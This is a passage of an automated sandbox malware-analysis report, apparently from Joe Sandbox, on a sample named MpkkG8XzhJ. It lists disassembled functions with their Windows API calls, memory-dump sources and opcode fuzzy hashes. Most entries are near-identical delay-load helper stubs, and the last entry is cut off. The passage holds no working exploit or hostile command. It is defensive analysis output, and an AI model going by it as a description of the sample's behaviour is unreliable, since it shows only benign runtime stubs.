    Function 000CFD48 Relevance: 1.5, APIs: 1, Instructions: 10COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CFD5A
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 490b152ba00cc9d127ef30e1b3e84164bce867013a5733b060b033ad75cc1e63
    • Instruction ID: c44c7383899d6d750acbb39d8e5273927655a78e207ce9e3221578675145b47a
    • Opcode Fuzzy Hash: 490b152ba00cc9d127ef30e1b3e84164bce867013a5733b060b033ad75cc1e63
    • Instruction Fuzzy Hash: 93B012D1268502BD330823512D02F7E020FC7C0B11330863FF103E404294400D881073
    Function 000CA235 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • DestroyWindow.USER32(?,00000000,000CE640,?,?,00000001,?,?,000CC999,000E60F0,00111CF0,00111CF0,00001000,000F30C4,00000000,?), ref: 000CA241
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: DestroyWindow
    • String ID:
    • API String ID: 3375834691-0
    • Opcode ID: 20c5eb64b173983e55459dc8e0584b98518955052ef6f0dcdc94ebb87ee5e133
    • Instruction ID: 75d3f517bec7855f88a98b667acd199b60de03e2d10c9fb2c555484fa6030852
    • Opcode Fuzzy Hash: 20c5eb64b173983e55459dc8e0584b98518955052ef6f0dcdc94ebb87ee5e133
    • Instruction Fuzzy Hash: 27C08C31011B20CBC3360B08EA0878276E0AB04B16F00C81DA09606860C3B0A880CA40
    Function 000CF363 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: a159d25fc422932c2e1ac387a589f75c5051ac6f5747866398a6a698aa6f0b78
    • Instruction ID: 45dd87aea856e45f1fae814b2f31d19a778de88d2d7d4be5b345ce05f3f1e9a9
    • Opcode Fuzzy Hash: a159d25fc422932c2e1ac387a589f75c5051ac6f5747866398a6a698aa6f0b78
    • Instruction Fuzzy Hash: 4AA001A62A9183BC7A5863627E16E7E022EC6D4B61370892FF50298482A8911A456472
    Function 000CF3A9 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: a29a032472eadcddd5a8d9e28ad8651962ae5d81ae2a96206349ef84c7b462b9
    • Instruction ID: 45dd87aea856e45f1fae814b2f31d19a778de88d2d7d4be5b345ce05f3f1e9a9
    • Opcode Fuzzy Hash: a29a032472eadcddd5a8d9e28ad8651962ae5d81ae2a96206349ef84c7b462b9
    • Instruction Fuzzy Hash: 4AA001A62A9183BC7A5863627E16E7E022EC6D4B61370892FF50298482A8911A456472
    Function 000CF3C7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF32D
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: c9ae8919c798da6b1a3302e271dcce8ecf3970f03beb3afc5a65bb384b3b7132
    • Instruction ID: 45dd87aea856e45f1fae814b2f31d19a778de88d2d7d4be5b345ce05f3f1e9a9
    • Opcode Fuzzy Hash: c9ae8919c798da6b1a3302e271dcce8ecf3970f03beb3afc5a65bb384b3b7132
    • Instruction Fuzzy Hash: 4AA001A62A9183BC7A5863627E16E7E022EC6D4B61370892FF50298482A8911A456472
    Function 000CF539 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF546
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 83c8634b9fb7ed389bd360b4874d531167e1ff9a7c12a38074e62930ee7033c2
    • Instruction ID: 2d50fe0ac2ddbd814d5a861284110089015832d56e95d72319fa0faaee063678
    • Opcode Fuzzy Hash: 83c8634b9fb7ed389bd360b4874d531167e1ff9a7c12a38074e62930ee7033c2
    • Instruction Fuzzy Hash: F4A012D12A40023D310427113E02E7E010EC2D0B50330402FF301D4041584008091032
    Function 000CF55E Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF546
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 6d6ebb2b5346ec7c43e84a3bde2afffd36f602c12094d412e1973a26ac316259
    • Instruction ID: 8bcae4834903ad3441854cbc0446968b18fffe579cec5c7e4dfac8cd2e2d69c8
    • Opcode Fuzzy Hash: 6d6ebb2b5346ec7c43e84a3bde2afffd36f602c12094d412e1973a26ac316259
    • Instruction Fuzzy Hash: 54A012D12A80037D310423113D02E7E010DC2C4B90330442FF302C4041584008091032
    Function 000CF554 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF546
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 7a4e314f2807d535c7a4c7f7695fa165a7ea2623f51b623502b1c0ec83073884
    • Instruction ID: 8bcae4834903ad3441854cbc0446968b18fffe579cec5c7e4dfac8cd2e2d69c8
    • Opcode Fuzzy Hash: 7a4e314f2807d535c7a4c7f7695fa165a7ea2623f51b623502b1c0ec83073884
    • Instruction Fuzzy Hash: 54A012D12A80037D310423113D02E7E010DC2C4B90330442FF302C4041584008091032
    Function 000CF57C Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF546
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 873b1e30218b30a8606140ef8f76d0a5b8352996116a8052d1b6c26a40d45ba7
    • Instruction ID: 8bcae4834903ad3441854cbc0446968b18fffe579cec5c7e4dfac8cd2e2d69c8
    • Opcode Fuzzy Hash: 873b1e30218b30a8606140ef8f76d0a5b8352996116a8052d1b6c26a40d45ba7
    • Instruction Fuzzy Hash: 54A012D12A80037D310423113D02E7E010DC2C4B90330442FF302C4041584008091032
    Function 000CF586 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF546
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 0b774c9e37774a6920c9f7063a39d182cbe55a4f144dc699d651addb5eb6691e
    • Instruction ID: 8bcae4834903ad3441854cbc0446968b18fffe579cec5c7e4dfac8cd2e2d69c8
    • Opcode Fuzzy Hash: 0b774c9e37774a6920c9f7063a39d182cbe55a4f144dc699d651addb5eb6691e
    • Instruction Fuzzy Hash: 54A012D12A80037D310423113D02E7E010DC2C4B90330442FF302C4041584008091032
    Function 000CF590 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF546
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: b08d01abdb68be55fb287a42bb392c203bf3e1b58e612bc6f2ec19111fd76174
    • Instruction ID: 8bcae4834903ad3441854cbc0446968b18fffe579cec5c7e4dfac8cd2e2d69c8
    • Opcode Fuzzy Hash: b08d01abdb68be55fb287a42bb392c203bf3e1b58e612bc6f2ec19111fd76174
    • Instruction Fuzzy Hash: 54A012D12A80037D310423113D02E7E010DC2C4B90330442FF302C4041584008091032
    Function 000CF6BD Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF69B
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: bb1e55d8f0bf64479e2a523281cd48d472687075d7f7af681b6ed836dfde035d
    • Instruction ID: b31545519e1748d301cb91006e4f3a8831fcee5ff807ea41c15247247b435fe6
    • Opcode Fuzzy Hash: bb1e55d8f0bf64479e2a523281cd48d472687075d7f7af681b6ed836dfde035d
    • Instruction Fuzzy Hash: 93A001A62B9143BC361863626E17E7E021EC6D8B65334893FF502A94D2A8A119452572
    Function 000CF6C7 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF69B
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 1cc674762fc082c9266d05f41729ccc291d63f3c7d432cacc3b5a8e42bcaad12
    • Instruction ID: b31545519e1748d301cb91006e4f3a8831fcee5ff807ea41c15247247b435fe6
    • Opcode Fuzzy Hash: 1cc674762fc082c9266d05f41729ccc291d63f3c7d432cacc3b5a8e42bcaad12
    • Instruction Fuzzy Hash: 93A001A62B9143BC361863626E17E7E021EC6D8B65334893FF502A94D2A8A119452572
    Function 000CF6DB Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF69B
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: 45bb3b83ae5478eb87fd26a609e8e3dde31813d92f42044571c26f24fd6aed8a
    • Instruction ID: b31545519e1748d301cb91006e4f3a8831fcee5ff807ea41c15247247b435fe6
    • Opcode Fuzzy Hash: 45bb3b83ae5478eb87fd26a609e8e3dde31813d92f42044571c26f24fd6aed8a
    • Instruction Fuzzy Hash: 93A001A62B9143BC361863626E17E7E021EC6D8B65334893FF502A94D2A8A119452572
    Function 000CF6D1 Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF69B
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
    • Source File: 00000000.00000002.2173713901.00000000000B1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000B0000, based on PE: true
    • Associated: 00000000.00000002.2173694177.00000000000B0000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173747990.00000000000E4000.00000002.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F0000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F3000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.00000000000F5000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173770824.0000000000114000.00000004.00000001.01000000.00000003.sdmpDownload File
    • Associated: 00000000.00000002.2173857017.0000000000115000.00000002.00000001.01000000.00000003.sdmpDownload File
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_0_2_b0000_MpkkG8XzhJ.jbxd
    Similarity
    • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
    • String ID:
    • API String ID: 1269201914-0
    • Opcode ID: efeddb7eeaad85996d4018915a46f85b687c9cb9bdecb295a84ef9013826dcbc
    • Instruction ID: b31545519e1748d301cb91006e4f3a8831fcee5ff807ea41c15247247b435fe6
    • Opcode Fuzzy Hash: efeddb7eeaad85996d4018915a46f85b687c9cb9bdecb295a84ef9013826dcbc
    • Instruction Fuzzy Hash: 93A001A62B9143BC361863626E17E7E021EC6D8B65334893FF502A94D2A8A119452572
    Function 000CF6EF Relevance: 1.5, APIs: 1, Instructions: 9COMMON
    Download Yara Rule
    APIs
    • ___delayLoadHelper2@8.DELAYIMP ref: 000CF6FC
      • Part of subcall function 000CF9D9: DloadReleaseSectionWriteAccess.DELAYIMP ref: 000CFA4C
      • Part of subcall function 000CF9D9: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 000CFA5D
    Memory Dump Source
